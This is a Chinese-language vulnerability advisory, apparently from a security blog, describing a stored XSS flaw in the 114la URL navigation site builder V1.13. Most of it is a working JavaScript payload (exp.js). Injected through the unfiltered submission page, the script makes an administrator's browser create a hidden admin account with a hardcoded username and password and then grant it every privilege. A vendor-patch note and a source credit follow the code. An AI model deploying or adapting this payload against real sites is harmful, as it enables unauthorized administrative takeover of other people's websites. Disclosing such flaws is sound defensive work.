114啦网址导航建站系统存在跨站脚本攻击漏洞

影响版本:
114la V1.13

程序介绍:

114啦网址导航是目前国内使用率最高的网址导航之一,本网址导航生成系统为雨林木风自主研发.

漏洞分析:

程序当中的/url-submit/index.php对提交的数据未过滤或编码直接插入数据库,造成了储蓄性XSS漏洞

漏洞利用:

exp.js

 
  1. //添加一个管理员账户     
  2. var siteurl = document.URL;     
  3. siteurl = siteurl.replace(/(.*\/){0,}([^\.]+).*/ig,"$1");     
  4. var username="sogili";//用户名     
  5. var password="sb250";//密码     
  6. var request = false;     
  7.     
  8. if(window.XMLHttpRequest) {     
  9. request = new XMLHttpRequest();     
  10. if(request.overrideMimeType) {     
  11. request.overrideMimeType(‘text/xml’);     
  12. }     
  13. else if(window.ActiveXObject) {     
  14. var versions = [‘Microsoft.XMLHTTP’‘MSXML.XMLHTTP’‘Microsoft.XMLHTTP’‘Msxml2.XMLHTTP.7.0’,‘Msxml2.XMLHTTP.6.0’,‘Msxml2.XMLHTTP.5.0’‘Msxml2.XMLHTTP.4.0’‘MSXML2.XMLHTTP.3.0’‘MSXML2.XMLHTTP’];     
  15. for(var i=0; i<versions.length; i++) {     
  16. try {     
  17. request = new ActiveXObject(versions[i]);     
  18. catch(e)      
  19. {}     
  20. }     
  21. }     
  22.     
  23. var xmlhttp=request;     
  24.     
  25. xmlhttp.open("GET",siteurl+"/index.php?c=member"false);     
  26. xmlhttp.setRequestHeader("Referer", siteurl);     
  27. xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");     
  28. xmlhttp.send();     
  29. if (xmlhttp.responseText.indexOf(username)<0) {     
  30. xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_add"false);     
  31. xmlhttp.setRequestHeader("Referer", siteurl);     
  32. xmlhttp.setRequestHeader("Content-Type""application/x-www-form-urlencoded");     
  33. xmlhttp.send("name=" + username + "&password=" + password + "&step=2");     
  34.     
  35. xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_edit"false);     
  36. xmlhttp.setRequestHeader("Referer", siteurl);     
  37. xmlhttp.setRequestHeader("Content-Type""application/x-www-form-urlencoded");     
  38. xmlhttp.send("auth%5Bmember114laurl_add114lafeedback%5D=1&auth%5Bconfig114la%5D=1&auth%5Bfamous_nav114lafamous_loop_playfamous_nav_tab114laindex_site114laindex_tool114lamztopl114larecycler%5D=1&auth%5Bzhuanti114lazhuanti_class%5D=1&auth%5Badvise_index114lakey%5D=1&auth%5Bbackup114larestore114larepair114laclear114lamysites%5D=1&auth%5Btemplate_manage%5D=1&auth%5Bmake_html114la%5D=1&auth%5Bheader114lamenu114lawelcome114laframe114lalogin%5D=1&auth%5Bsecurity114la%5D=1&auth%5Bsite_manage%5D=1&auth%5Bplan%5D=1&auth%5Bclass%5D=1&auth%5Blog%5D=1&step=2&name=" + username);     
  39. }    

解决方案:
厂商补丁:
114la
——-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.xiazaiba.com/html/114.html

信息来源:
<*来源: Sogili’s blog
链接: http://www.sogili.com/?action=show&id=2
*>

发表评论?

0 条评论。

发表评论